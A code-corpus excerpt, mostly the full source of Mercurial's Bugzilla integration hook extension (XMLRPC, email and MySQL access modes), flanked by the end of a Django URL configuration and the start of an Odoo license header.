    url(r'^ueditor/',include('DjangoUeditor.urls' )),
]
# site-wide error handlers (dotted view paths resolved by Django)
handler404 = 'users.views.page_not_found'
handler500 = 'users.views.page_error'
handler403 = 'users.views.page_no_permission'
| apache-2.0 |
ibinti/intellij-community | plugins/hg4idea/testData/bin/hgext/bugzilla.py | 93 | 34937 | # bugzilla.py - bugzilla integration for mercurial
#
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
# Copyright 2011-2 Jim Hague <jim.hague@acm.org>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
'''hooks for integrating with the Bugzilla bug tracker
This hook extension adds comments on bugs in Bugzilla when changesets
that refer to bugs by Bugzilla ID are seen. The comment is formatted using
the Mercurial template mechanism.
The bug references can optionally include an update for Bugzilla of the
hours spent working on the bug. Bugs can also be marked fixed.
Three basic modes of access to Bugzilla are provided:
1. Access via the Bugzilla XMLRPC interface. Requires Bugzilla 3.4 or later.
2. Check data via the Bugzilla XMLRPC interface and submit bug change
via email to Bugzilla email interface. Requires Bugzilla 3.4 or later.
3. Writing directly to the Bugzilla database. Only Bugzilla installations
using MySQL are supported. Requires Python MySQLdb.
Writing directly to the database is susceptible to schema changes, and
relies on a Bugzilla contrib script to send out bug change
notification emails. This script runs as the user running Mercurial,
must be run on the host with the Bugzilla install, and requires
permission to read Bugzilla configuration details and the necessary
MySQL user and password to have full access rights to the Bugzilla
database. For these reasons this access mode is now considered
deprecated, and will not be updated for new Bugzilla versions going
forward. Only adding comments is supported in this access mode.
Access via XMLRPC needs a Bugzilla username and password to be specified
in the configuration. Comments are added under that username. Since the
configuration must be readable by all Mercurial users, it is recommended
that the rights of that user are restricted in Bugzilla to the minimum
necessary to add comments. Marking bugs fixed requires Bugzilla 4.0 and later.
Access via XMLRPC/email uses XMLRPC to query Bugzilla, but sends
email to the Bugzilla email interface to submit comments to bugs.
The From: address in the email is set to the email address of the Mercurial
user, so the comment appears to come from the Mercurial user. In the event
that the Mercurial user email is not recognized by Bugzilla as a Bugzilla
user, the email associated with the Bugzilla username used to log into
Bugzilla is used instead as the source of the comment. Marking bugs fixed
works on all supported Bugzilla versions.
Configuration items common to all access modes:
bugzilla.version
The access type to use. Values recognized are:
:``xmlrpc``: Bugzilla XMLRPC interface.
:``xmlrpc+email``: Bugzilla XMLRPC and email interfaces.
:``3.0``: MySQL access, Bugzilla 3.0 and later.
:``2.18``: MySQL access, Bugzilla 2.18 and up to but not
including 3.0.
:``2.16``: MySQL access, Bugzilla 2.16 and up to but not
including 2.18.
bugzilla.regexp
Regular expression to match bug IDs for update in changeset commit message.
It must contain one "()" named group ``<ids>`` containing the bug
IDs separated by non-digit characters. It may also contain
a named group ``<hours>`` with a floating-point number giving the
hours worked on the bug. If no named groups are present, the first
"()" group is assumed to contain the bug IDs, and work time is not
updated. The default expression matches ``Bug 1234``, ``Bug no. 1234``,
``Bug number 1234``, ``Bugs 1234,5678``, ``Bug 1234 and 5678`` and
variations thereof, followed by an hours number prefixed by ``h`` or
``hours``, e.g. ``hours 1.5``. Matching is case insensitive.
bugzilla.fixregexp
Regular expression to match bug IDs for marking fixed in changeset
commit message. This must contain a "()" named group ``<ids>` containing
the bug IDs separated by non-digit characters. It may also contain
a named group ``<hours>`` with a floating-point number giving the
hours worked on the bug. If no named groups are present, the first
"()" group is assumed to contain the bug IDs, and work time is not
updated. The default expression matches ``Fixes 1234``, ``Fixes bug 1234``,
``Fixes bugs 1234,5678``, ``Fixes 1234 and 5678`` and
variations thereof, followed by an hours number prefixed by ``h`` or
``hours``, e.g. ``hours 1.5``. Matching is case insensitive.
bugzilla.fixstatus
The status to set a bug to when marking fixed. Default ``RESOLVED``.
bugzilla.fixresolution
The resolution to set a bug to when marking fixed. Default ``FIXED``.
bugzilla.style
The style file to use when formatting comments.
bugzilla.template
Template to use when formatting comments. Overrides style if
specified. In addition to the usual Mercurial keywords, the
extension specifies:
:``{bug}``: The Bugzilla bug ID.
:``{root}``: The full pathname of the Mercurial repository.
:``{webroot}``: Stripped pathname of the Mercurial repository.
:``{hgweb}``: Base URL for browsing Mercurial repositories.
Default ``changeset {node|short} in repo {root} refers to bug
{bug}.\\ndetails:\\n\\t{desc|tabindent}``
bugzilla.strip
The number of path separator characters to strip from the front of
the Mercurial repository path (``{root}`` in templates) to produce
``{webroot}``. For example, a repository with ``{root}``
``/var/local/my-project`` with a strip of 2 gives a value for
``{webroot}`` of ``my-project``. Default 0.
web.baseurl
Base URL for browsing Mercurial repositories. Referenced from
templates as ``{hgweb}``.
Configuration items common to XMLRPC+email and MySQL access modes:
bugzilla.usermap
Path of file containing Mercurial committer email to Bugzilla user email
mappings. If specified, the file should contain one mapping per
line::
committer = Bugzilla user
See also the ``[usermap]`` section.
The ``[usermap]`` section is used to specify mappings of Mercurial
committer email to Bugzilla user email. See also ``bugzilla.usermap``.
Contains entries of the form ``committer = Bugzilla user``.
XMLRPC access mode configuration:
bugzilla.bzurl
The base URL for the Bugzilla installation.
Default ``http://localhost/bugzilla``.
bugzilla.user
The username to use to log into Bugzilla via XMLRPC. Default
``bugs``.
bugzilla.password
The password for Bugzilla login.
XMLRPC+email access mode uses the XMLRPC access mode configuration items,
and also:
bugzilla.bzemail
The Bugzilla email address.
In addition, the Mercurial email settings must be configured. See the
documentation in hgrc(5), sections ``[email]`` and ``[smtp]``.
MySQL access mode configuration:
bugzilla.host
Hostname of the MySQL server holding the Bugzilla database.
Default ``localhost``.
bugzilla.db
Name of the Bugzilla database in MySQL. Default ``bugs``.
bugzilla.user
Username to use to access MySQL server. Default ``bugs``.
bugzilla.password
Password to use to access MySQL server.
bugzilla.timeout
Database connection timeout (seconds). Default 5.
bugzilla.bzuser
Fallback Bugzilla user name to record comments with, if changeset
committer cannot be found as a Bugzilla user.
bugzilla.bzdir
Bugzilla install directory. Used by default notify. Default
``/var/www/html/bugzilla``.
bugzilla.notify
The command to run to get Bugzilla to send bug change notification
emails. Substitutes from a map with 3 keys, ``bzdir``, ``id`` (bug
id) and ``user`` (committer bugzilla email). Default depends on
version; from 2.18 it is "cd %(bzdir)s && perl -T
contrib/sendbugmail.pl %(id)s %(user)s".
Activating the extension::
[extensions]
bugzilla =
[hooks]
# run bugzilla hook on every change pulled or pushed in here
incoming.bugzilla = python:hgext.bugzilla.hook
Example configurations:
XMLRPC example configuration. This uses the Bugzilla at
``http://my-project.org/bugzilla``, logging in as user
``bugmail@my-project.org`` with password ``plugh``. It is used with a
collection of Mercurial repositories in ``/var/local/hg/repos/``,
with a web interface at ``http://my-project.org/hg``. ::
[bugzilla]
bzurl=http://my-project.org/bugzilla
user=bugmail@my-project.org
password=plugh
version=xmlrpc
template=Changeset {node|short} in {root|basename}.
{hgweb}/{webroot}/rev/{node|short}\\n
{desc}\\n
strip=5
[web]
baseurl=http://my-project.org/hg
XMLRPC+email example configuration. This uses the Bugzilla at
``http://my-project.org/bugzilla``, logging in as user
``bugmail@my-project.org`` with password ``plugh``. It is used with a
collection of Mercurial repositories in ``/var/local/hg/repos/``,
with a web interface at ``http://my-project.org/hg``. Bug comments
are sent to the Bugzilla email address
``bugzilla@my-project.org``. ::
[bugzilla]
bzurl=http://my-project.org/bugzilla
user=bugmail@my-project.org
password=plugh
version=xmlrpc
bzemail=bugzilla@my-project.org
template=Changeset {node|short} in {root|basename}.
{hgweb}/{webroot}/rev/{node|short}\\n
{desc}\\n
strip=5
[web]
baseurl=http://my-project.org/hg
[usermap]
user@emaildomain.com=user.name@bugzilladomain.com
MySQL example configuration. This has a local Bugzilla 3.2 installation
in ``/opt/bugzilla-3.2``. The MySQL database is on ``localhost``,
the Bugzilla database name is ``bugs`` and MySQL is
accessed with MySQL username ``bugs`` password ``XYZZY``. It is used
with a collection of Mercurial repositories in ``/var/local/hg/repos/``,
with a web interface at ``http://my-project.org/hg``. ::
[bugzilla]
host=localhost
password=XYZZY
version=3.0
bzuser=unknown@domain.com
bzdir=/opt/bugzilla-3.2
template=Changeset {node|short} in {root|basename}.
{hgweb}/{webroot}/rev/{node|short}\\n
{desc}\\n
strip=5
[web]
baseurl=http://my-project.org/hg
[usermap]
user@emaildomain.com=user.name@bugzilladomain.com
All the above add a comment to the Bugzilla bug record of the form::
Changeset 3b16791d6642 in repository-name.
http://my-project.org/hg/repository-name/rev/3b16791d6642
Changeset commit comment. Bug 1234.
'''
from mercurial.i18n import _
from mercurial.node import short
from mercurial import cmdutil, mail, templater, util
import re, time, urlparse, xmlrpclib
testedwith = 'internal'
class bzaccess(object):
    '''Base class for access to Bugzilla.'''

    def __init__(self, ui):
        self.ui = ui
        # optional file mapping Mercurial committer emails to Bugzilla
        # logins; merged into the [usermap] config section when present
        usermap = self.ui.config('bugzilla', 'usermap')
        if usermap:
            self.ui.readconfig(usermap, sections=['usermap'])

    def map_committer(self, user):
        '''map name of committer to Bugzilla user name.'''
        # case-insensitive lookup in [usermap]; unmapped committers are
        # returned unchanged
        for committer, bzuser in self.ui.configitems('usermap'):
            if committer.lower() == user.lower():
                return bzuser
        return user

    # Methods to be implemented by access classes.
    #
    # 'bugs' is a dict keyed on bug id, where values are a dict holding
    # updates to bug state. Recognized dict keys are:
    #
    # 'hours': Value, float containing work hours to be updated.
    # 'fix': If key present, bug is to be marked fixed. Value ignored.

    def filter_real_bug_ids(self, bugs):
        '''remove bug IDs that do not exist in Bugzilla from bugs.'''
        pass

    def filter_cset_known_bug_ids(self, node, bugs):
        '''remove bug IDs where node occurs in comment text from bugs.'''
        pass

    def updatebug(self, bugid, newstate, text, committer):
        '''update the specified bug. Add comment text and set new states.

        If possible add the comment as being from the committer of
        the changeset. Otherwise use the default Bugzilla user.
        '''
        pass

    def notify(self, bugs, committer):
        '''Force sending of Bugzilla notification emails.

        Only required if the access method does not trigger notification
        emails automatically.
        '''
        pass
# Bugzilla via direct access to MySQL database.
class bzmysql(bzaccess):
    '''Support for direct MySQL access to Bugzilla.

    The earliest Bugzilla version this is tested with is version 2.16.

    If your Bugzilla is version 3.4 or above, you are strongly
    recommended to use the XMLRPC access method instead.
    '''

    @staticmethod
    def sql_buglist(ids):
        '''return SQL-friendly list of bug ids'''
        return '(' + ','.join(map(str, ids)) + ')'

    # lazily bound MySQLdb module (import deferred so the extension
    # loads even when the driver is absent)
    _MySQLdb = None

    def __init__(self, ui):
        try:
            import MySQLdb as mysql
            bzmysql._MySQLdb = mysql
        except ImportError, err:
            raise util.Abort(_('python mysql support not available: %s') % err)

        bzaccess.__init__(self, ui)

        # connection parameters from the [bugzilla] config section
        host = self.ui.config('bugzilla', 'host', 'localhost')
        user = self.ui.config('bugzilla', 'user', 'bugs')
        passwd = self.ui.config('bugzilla', 'password')
        db = self.ui.config('bugzilla', 'db', 'bugs')
        timeout = int(self.ui.config('bugzilla', 'timeout', 5))
        self.ui.note(_('connecting to %s:%s as %s, password %s\n') %
                     (host, db, user, '*' * len(passwd)))
        self.conn = bzmysql._MySQLdb.connect(host=host,
                                             user=user, passwd=passwd,
                                             db=db,
                                             connect_timeout=timeout)
        self.cursor = self.conn.cursor()
        self.longdesc_id = self.get_longdesc_id()
        # cache of login -> numeric userid lookups
        self.user_ids = {}
        self.default_notify = "cd %(bzdir)s && ./processmail %(id)s %(user)s"

    def run(self, *args, **kwargs):
        '''run a query.'''
        self.ui.note(_('query: %s %s\n') % (args, kwargs))
        try:
            self.cursor.execute(*args, **kwargs)
        except bzmysql._MySQLdb.MySQLError:
            self.ui.note(_('failed query: %s %s\n') % (args, kwargs))
            raise

    def get_longdesc_id(self):
        '''get identity of longdesc field'''
        self.run('select fieldid from fielddefs where name = "longdesc"')
        ids = self.cursor.fetchall()
        if len(ids) != 1:
            raise util.Abort(_('unknown database schema'))
        return ids[0][0]

    def filter_real_bug_ids(self, bugs):
        '''filter not-existing bugs from set.'''
        self.run('select bug_id from bugs where bug_id in %s' %
                 bzmysql.sql_buglist(bugs.keys()))
        existing = [id for (id,) in self.cursor.fetchall()]
        # drop (and report) ids the database does not know
        for id in bugs.keys():
            if id not in existing:
                self.ui.status(_('bug %d does not exist\n') % id)
                del bugs[id]

    def filter_cset_known_bug_ids(self, node, bugs):
        '''filter bug ids that already refer to this changeset from set.'''
        self.run('''select bug_id from longdescs where
bug_id in %s and thetext like "%%%s%%"''' %
                 (bzmysql.sql_buglist(bugs.keys()), short(node)))
        for (id,) in self.cursor.fetchall():
            self.ui.status(_('bug %d already knows about changeset %s\n') %
                           (id, short(node)))
            del bugs[id]

    def notify(self, bugs, committer):
        '''tell bugzilla to send mail.'''
        self.ui.status(_('telling bugzilla to send mail:\n'))
        (user, userid) = self.get_bugzilla_user(committer)
        for id in bugs.keys():
            self.ui.status(_(' bug %s\n') % id)
            cmdfmt = self.ui.config('bugzilla', 'notify', self.default_notify)
            bzdir = self.ui.config('bugzilla', 'bzdir',
                                   '/var/www/html/bugzilla')
            try:
                # Backwards-compatible with old notify string, which
                # took one string. This will throw with a new format
                # string.
                cmd = cmdfmt % id
            except TypeError:
                cmd = cmdfmt % {'bzdir': bzdir, 'id': id, 'user': user}
            self.ui.note(_('running notify command %s\n') % cmd)
            # run the notify command with stderr folded into stdout so
            # failures can be shown to the user
            fp = util.popen('(%s) 2>&1' % cmd)
            out = fp.read()
            ret = fp.close()
            if ret:
                self.ui.warn(out)
                raise util.Abort(_('bugzilla notify command %s') %
                                 util.explainexit(ret)[0])
        self.ui.status(_('done\n'))

    def get_user_id(self, user):
        '''look up numeric bugzilla user id.'''
        try:
            return self.user_ids[user]
        except KeyError:
            try:
                # a purely numeric "user" is already an id
                userid = int(user)
            except ValueError:
                self.ui.note(_('looking up user %s\n') % user)
                self.run('''select userid from profiles
where login_name like %s''', user)
                all = self.cursor.fetchall()
                if len(all) != 1:
                    raise KeyError(user)
                userid = int(all[0][0])
            self.user_ids[user] = userid
            return userid

    def get_bugzilla_user(self, committer):
        '''See if committer is a registered bugzilla user. Return
        bugzilla username and userid if so. If not, return default
        bugzilla username and userid.'''
        user = self.map_committer(committer)
        try:
            userid = self.get_user_id(user)
        except KeyError:
            try:
                # fall back to the configured 'bzuser' account
                defaultuser = self.ui.config('bugzilla', 'bzuser')
                if not defaultuser:
                    raise util.Abort(_('cannot find bugzilla user id for %s') %
                                     user)
                userid = self.get_user_id(defaultuser)
                user = defaultuser
            except KeyError:
                raise util.Abort(_('cannot find bugzilla user id for %s or %s')
                                 % (user, defaultuser))
        return (user, userid)

    def updatebug(self, bugid, newstate, text, committer):
        '''update bug state with comment text.

        Try adding comment as committer of changeset, otherwise as
        default bugzilla user.'''
        # this access mode can only add comments, not change bug state
        if len(newstate) > 0:
            self.ui.warn(_("Bugzilla/MySQL cannot update bug state\n"))

        (user, userid) = self.get_bugzilla_user(committer)
        now = time.strftime('%Y-%m-%d %H:%M:%S')
        self.run('''insert into longdescs
(bug_id, who, bug_when, thetext)
values (%s, %s, %s, %s)''',
                 (bugid, userid, now, text))
        self.run('''insert into bugs_activity (bug_id, who, bug_when, fieldid)
values (%s, %s, %s, %s)''',
                 (bugid, userid, now, self.longdesc_id))
        self.conn.commit()
class bzmysql_2_18(bzmysql):
    '''support for bugzilla 2.18 series.'''

    def __init__(self, ui):
        bzmysql.__init__(self, ui)
        # 2.18 replaced ./processmail with the sendbugmail contrib script
        self.default_notify = \
            "cd %(bzdir)s && perl -T contrib/sendbugmail.pl %(id)s %(user)s"
class bzmysql_3_0(bzmysql_2_18):
    '''support for bugzilla 3.0 series.'''

    def __init__(self, ui):
        bzmysql_2_18.__init__(self, ui)

    def get_longdesc_id(self):
        '''get identity of longdesc field'''
        # schema change: the fielddefs key column is 'id' from 3.0 on
        # (it was 'fieldid' in older versions)
        self.run('select id from fielddefs where name = "longdesc"')
        ids = self.cursor.fetchall()
        if len(ids) != 1:
            raise util.Abort(_('unknown database schema'))
        return ids[0][0]
# Bugzilla via XMLRPC interface.
class cookietransportrequest(object):
    """A Transport request method that retains cookies over its lifetime.

    The regular xmlrpclib transports ignore cookies. Which causes
    a bit of a problem when you need a cookie-based login, as with
    the Bugzilla XMLRPC interface.

    So this is a helper for defining a Transport which looks for
    cookies being set in responses and saves them to add to all future
    requests.
    """

    # Inspiration drawn from
    # http://blog.godson.in/2010/09/how-to-make-python-xmlrpclib-client.html
    # http://www.itkovian.net/base/transport-class-for-pythons-xml-rpc-lib/

    # class-level cookie jar: cookies are shared by every transport
    # instance for the lifetime of the process
    cookies = []

    def send_cookies(self, connection):
        # replay every stored cookie on the outgoing request
        if self.cookies:
            for cookie in self.cookies:
                connection.putheader("Cookie", cookie)

    def request(self, host, handler, request_body, verbose=0):
        self.verbose = verbose
        self.accept_gzip_encoding = False

        # issue XML-RPC request
        h = self.make_connection(host)
        if verbose:
            h.set_debuglevel(1)

        # the send_* calls below must stay in this order: they emit the
        # request line, headers (including our cookies) and then body
        self.send_request(h, handler, request_body)
        self.send_host(h, host)
        self.send_cookies(h)
        self.send_user_agent(h)
        self.send_content(h, request_body)

        # Deal with differences between Python 2.4-2.6 and 2.7.
        # In the former h is a HTTP(S). In the latter it's a
        # HTTP(S)Connection. Luckily, the 2.4-2.6 implementation of
        # HTTP(S) has an underlying HTTP(S)Connection, so extract
        # that and use it.
        try:
            response = h.getresponse()
        except AttributeError:
            response = h._conn.getresponse()

        # Add any cookie definitions to our list.
        for header in response.msg.getallmatchingheaders("Set-Cookie"):
            val = header.split(": ", 1)[1]
            cookie = val.split(";", 1)[0]
            self.cookies.append(cookie)

        if response.status != 200:
            raise xmlrpclib.ProtocolError(host + handler, response.status,
                                          response.reason, response.msg.headers)

        # parse the XML-RPC payload into Python values
        payload = response.read()
        parser, unmarshaller = self.getparser()
        parser.feed(payload)
        parser.close()

        return unmarshaller.close()
# The explicit calls to the underlying xmlrpclib __init__() methods are
# necessary. The xmlrpclib.Transport classes are old-style classes, and
# it turns out their __init__() doesn't get called when doing multiple
# inheritance with a new-style class.
class cookietransport(cookietransportrequest, xmlrpclib.Transport):
    # plain-HTTP transport with cookie retention
    def __init__(self, use_datetime=0):
        # xmlrpclib.Transport is an old-style class, so its __init__ is
        # not run by normal MI dispatch; call it explicitly when present
        if util.safehasattr(xmlrpclib.Transport, "__init__"):
            xmlrpclib.Transport.__init__(self, use_datetime)
class cookiesafetransport(cookietransportrequest, xmlrpclib.SafeTransport):
    # HTTPS transport with cookie retention
    def __init__(self, use_datetime=0):
        # NOTE(review): the probe checks Transport rather than
        # SafeTransport; presumably harmless because SafeTransport
        # derives from Transport — confirm before changing
        if util.safehasattr(xmlrpclib.Transport, "__init__"):
            xmlrpclib.SafeTransport.__init__(self, use_datetime)
class bzxmlrpc(bzaccess):
    """Support for access to Bugzilla via the Bugzilla XMLRPC API.

    Requires a minimum Bugzilla version 3.4.
    """

    def __init__(self, ui):
        bzaccess.__init__(self, ui)

        bzweb = self.ui.config('bugzilla', 'bzurl',
                               'http://localhost/bugzilla/')
        bzweb = bzweb.rstrip("/") + "/xmlrpc.cgi"

        user = self.ui.config('bugzilla', 'user', 'bugs')
        passwd = self.ui.config('bugzilla', 'password')

        self.fixstatus = self.ui.config('bugzilla', 'fixstatus', 'RESOLVED')
        self.fixresolution = self.ui.config('bugzilla', 'fixresolution',
                                            'FIXED')

        # log in once at construction; the cookie transports keep the
        # session for subsequent calls
        self.bzproxy = xmlrpclib.ServerProxy(bzweb, self.transport(bzweb))
        ver = self.bzproxy.Bugzilla.version()['version'].split('.')
        self.bzvermajor = int(ver[0])
        self.bzverminor = int(ver[1])
        self.bzproxy.User.login(dict(login=user, password=passwd))

    def transport(self, uri):
        # pick the TLS-capable transport for https URLs
        if urlparse.urlparse(uri, "http")[0] == "https":
            return cookiesafetransport()
        else:
            return cookietransport()

    def get_bug_comments(self, id):
        """Return a string with all comment text for a bug."""
        c = self.bzproxy.Bug.comments(dict(ids=[id], include_fields=['text']))
        return ''.join([t['text'] for t in c['bugs'][str(id)]['comments']])

    def filter_real_bug_ids(self, bugs):
        # permissive=True makes Bug.get report unknown ids in 'faults'
        # instead of raising, so we can drop them one by one
        probe = self.bzproxy.Bug.get(dict(ids=sorted(bugs.keys()),
                                          include_fields=[],
                                          permissive=True))
        for badbug in probe['faults']:
            id = badbug['id']
            self.ui.status(_('bug %d does not exist\n') % id)
            del bugs[id]

    def filter_cset_known_bug_ids(self, node, bugs):
        # drop bugs whose comments already mention this changeset hash
        for id in sorted(bugs.keys()):
            if self.get_bug_comments(id).find(short(node)) != -1:
                self.ui.status(_('bug %d already knows about changeset %s\n') %
                               (id, short(node)))
                del bugs[id]

    def updatebug(self, bugid, newstate, text, committer):
        args = {}
        if 'hours' in newstate:
            args['work_time'] = newstate['hours']

        if self.bzvermajor >= 4:
            # Bug.update (4.0+) can change status/resolution and add the
            # comment in a single call
            args['ids'] = [bugid]
            args['comment'] = {'body' : text}
            if 'fix' in newstate:
                args['status'] = self.fixstatus
                args['resolution'] = self.fixresolution
            self.bzproxy.Bug.update(args)
        else:
            # pre-4.0 API can only add comments
            if 'fix' in newstate:
                self.ui.warn(_("Bugzilla/XMLRPC needs Bugzilla 4.0 or later "
                               "to mark bugs fixed\n"))
            args['id'] = bugid
            args['comment'] = text
            self.bzproxy.Bug.add_comment(args)
class bzxmlrpcemail(bzxmlrpc):
    """Read data from Bugzilla via XMLRPC, send updates via email.

    Advantages of sending updates via email:
      1. Comments can be added as any user, not just logged in user.
      2. Bug statuses or other fields not accessible via XMLRPC can
         potentially be updated.

    There is no XMLRPC function to change bug status before Bugzilla
    4.0, so bugs cannot be marked fixed via XMLRPC before Bugzilla 4.0.
    But bugs can be marked fixed via email from 3.4 onwards.
    """

    # The email interface changes subtly between 3.4 and 3.6. In 3.4,
    # in-email fields are specified as '@<fieldname> = <value>'. In
    # 3.6 this becomes '@<fieldname> <value>'. And fieldname @bug_id
    # in 3.4 becomes @id in 3.6. 3.6 and 4.0 both maintain backwards
    # compatibility, but rather than rely on this use the new format for
    # 4.0 onwards.

    def __init__(self, ui):
        bzxmlrpc.__init__(self, ui)

        self.bzemail = self.ui.config('bugzilla', 'bzemail')
        if not self.bzemail:
            raise util.Abort(_("configuration 'bzemail' missing"))
        mail.validateconfig(self.ui)

    def makecommandline(self, fieldname, value):
        # format one in-email command line per the version notes above
        if self.bzvermajor >= 4:
            return "@%s %s" % (fieldname, str(value))
        else:
            if fieldname == "id":
                fieldname = "bug_id"
            return "@%s = %s" % (fieldname, str(value))

    def send_bug_modify_email(self, bugid, commands, comment, committer):
        '''send modification message to Bugzilla bug via email.

        The message format is documented in the Bugzilla email_in.pl
        specification. commands is a list of command lines, comment is the
        comment text.

        To stop users from crafting commit comments with
        Bugzilla commands, specify the bug ID via the message body, rather
        than the subject line, and leave a blank line after it.
        '''
        user = self.map_committer(committer)
        matches = self.bzproxy.User.get(dict(match=[user]))
        if not matches['users']:
            # committer unknown to Bugzilla: fall back to the configured
            # login's registered email address
            user = self.ui.config('bugzilla', 'user', 'bugs')
            matches = self.bzproxy.User.get(dict(match=[user]))
            if not matches['users']:
                raise util.Abort(_("default bugzilla user %s email not found") %
                                 user)
        user = matches['users'][0]['email']
        commands.append(self.makecommandline("id", bugid))

        # commands first, blank line, then the free-form comment
        text = "\n".join(commands) + "\n\n" + comment

        _charsets = mail._charsets(self.ui)
        user = mail.addressencode(self.ui, user, _charsets)
        bzemail = mail.addressencode(self.ui, self.bzemail, _charsets)
        msg = mail.mimeencode(self.ui, text, _charsets)
        msg['From'] = user
        msg['To'] = bzemail
        msg['Subject'] = mail.headencode(self.ui, "Bug modification", _charsets)
        sendmail = mail.connect(self.ui)
        sendmail(user, bzemail, msg.as_string())

    def updatebug(self, bugid, newstate, text, committer):
        cmds = []
        if 'hours' in newstate:
            cmds.append(self.makecommandline("work_time", newstate['hours']))
        if 'fix' in newstate:
            cmds.append(self.makecommandline("bug_status", self.fixstatus))
            cmds.append(self.makecommandline("resolution", self.fixresolution))
        self.send_bug_modify_email(bugid, cmds, text, committer)
class bugzilla(object):
    # supported versions of bugzilla. different versions have
    # different schemas.
    _versions = {
        '2.16': bzmysql,
        '2.18': bzmysql_2_18,
        '3.0': bzmysql_3_0,
        'xmlrpc': bzxmlrpc,
        'xmlrpc+email': bzxmlrpcemail
        }

    # default pattern for "refers to bug(s) N[, M...] [hours H]"
    _default_bug_re = (r'bugs?\s*,?\s*(?:#|nos?\.?|num(?:ber)?s?)?\s*'
                       r'(?P<ids>(?:\d+\s*(?:,?\s*(?:and)?)?\s*)+)'
                       r'\.?\s*(?:h(?:ours?)?\s*(?P<hours>\d*(?:\.\d+)?))?')

    # default pattern for "fixes bug(s) N[, M...] [hours H]"
    _default_fix_re = (r'fix(?:es)?\s*(?:bugs?\s*)?,?\s*'
                       r'(?:nos?\.?|num(?:ber)?s?)?\s*'
                       r'(?P<ids>(?:#?\d+\s*(?:,?\s*(?:and)?)?\s*)+)'
                       r'\.?\s*(?:h(?:ours?)?\s*(?P<hours>\d*(?:\.\d+)?))?')

    # class-level singleton access object, created on first use
    _bz = None

    def __init__(self, ui, repo):
        self.ui = ui
        self.repo = repo

    def bz(self):
        '''return object that knows how to talk to bugzilla version in
        use.'''
        if bugzilla._bz is None:
            bzversion = self.ui.config('bugzilla', 'version')
            try:
                bzclass = bugzilla._versions[bzversion]
            except KeyError:
                raise util.Abort(_('bugzilla version %s not supported') %
                                 bzversion)
            bugzilla._bz = bzclass(self.ui)
        return bugzilla._bz

    def __getattr__(self, key):
        # delegate unknown attributes to the access object
        return getattr(self.bz(), key)

    # compiled regexes, built lazily from config in find_bugs()
    _bug_re = None
    _fix_re = None
    _split_re = None

    def find_bugs(self, ctx):
        '''return bugs dictionary created from commit comment.

        Extract bug info from changeset comments. Filter out any that are
        not known to Bugzilla, and any that already have a reference to
        the given changeset in their comments.
        '''
        if bugzilla._bug_re is None:
            bugzilla._bug_re = re.compile(
                self.ui.config('bugzilla', 'regexp',
                               bugzilla._default_bug_re), re.IGNORECASE)
            bugzilla._fix_re = re.compile(
                self.ui.config('bugzilla', 'fixregexp',
                               bugzilla._default_fix_re), re.IGNORECASE)
            bugzilla._split_re = re.compile(r'\D+')
        start = 0
        hours = 0.0
        bugs = {}
        # walk both regexes through the description in textual order,
        # always consuming whichever match comes first
        bugmatch = bugzilla._bug_re.search(ctx.description(), start)
        fixmatch = bugzilla._fix_re.search(ctx.description(), start)
        while True:
            bugattribs = {}
            if not bugmatch and not fixmatch:
                break
            if not bugmatch:
                m = fixmatch
            elif not fixmatch:
                m = bugmatch
            else:
                if bugmatch.start() < fixmatch.start():
                    m = bugmatch
                else:
                    m = fixmatch
            start = m.end()
            if m is bugmatch:
                bugmatch = bugzilla._bug_re.search(ctx.description(), start)
                if 'fix' in bugattribs:
                    del bugattribs['fix']
            else:
                fixmatch = bugzilla._fix_re.search(ctx.description(), start)
                bugattribs['fix'] = None

            try:
                ids = m.group('ids')
            except IndexError:
                # custom regexp without an <ids> group: use group 1
                ids = m.group(1)
            try:
                hours = float(m.group('hours'))
                bugattribs['hours'] = hours
            except IndexError:
                # regexp has no <hours> group
                pass
            except TypeError:
                # <hours> group present but did not match
                pass
            except ValueError:
                self.ui.status(_("%s: invalid hours\n") % m.group('hours'))

            for id in bugzilla._split_re.split(ids):
                if not id:
                    continue
                bugs[int(id)] = bugattribs
        if bugs:
            self.filter_real_bug_ids(bugs)
        if bugs:
            self.filter_cset_known_bug_ids(ctx.node(), bugs)
        return bugs

    def update(self, bugid, newstate, ctx):
        '''update bugzilla bug with reference to changeset.'''

        def webroot(root):
            '''strip leading prefix of repo root and turn into
            url-safe path.'''
            count = int(self.ui.config('bugzilla', 'strip', 0))
            root = util.pconvert(root)
            while count > 0:
                c = root.find('/')
                if c == -1:
                    break
                root = root[c + 1:]
                count -= 1
            return root

        mapfile = self.ui.config('bugzilla', 'style')
        tmpl = self.ui.config('bugzilla', 'template')
        t = cmdutil.changeset_templater(self.ui, self.repo,
                                        False, None, mapfile, False)
        if not mapfile and not tmpl:
            tmpl = _('changeset {node|short} in repo {root} refers '
                     'to bug {bug}.\ndetails:\n\t{desc|tabindent}')
        if tmpl:
            tmpl = templater.parsestring(tmpl, quoted=False)
            t.use_template(tmpl)
        # render the comment into a ui buffer, then hand it to the
        # access object together with the committer's email
        self.ui.pushbuffer()
        t.show(ctx, changes=ctx.changeset(),
               bug=str(bugid),
               hgweb=self.ui.config('web', 'baseurl'),
               root=self.repo.root,
               webroot=webroot(self.repo.root))
        data = self.ui.popbuffer()
        self.updatebug(bugid, newstate, data, util.email(ctx.user()))
def hook(ui, repo, hooktype, node=None, **kwargs):
    '''add comment to bugzilla for each changeset that refers to a
    bugzilla bug id. only add a comment once per bug, so same change
    seen multiple times does not fill bug with duplicate data.'''
    # only changeset-carrying hooks (e.g. incoming/commit) are usable
    if node is None:
        raise util.Abort(_('hook type %s does not pass a changeset id') %
                         hooktype)
    try:
        bz = bugzilla(ui, repo)
        ctx = repo[node]
        bugs = bz.find_bugs(ctx)
        if bugs:
            for bug in bugs:
                bz.update(bug, bugs[bug], ctx)
            bz.notify(bugs, util.email(ctx.user()))
    except Exception, e:
        # surface any failure as a hook abort so Mercurial reports it
        raise util.Abort(_('Bugzilla error: %s') % e)
| apache-2.0 |
hoatle/odoo | addons/account_check_writing/report/check_print.py | 320 | 2943 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
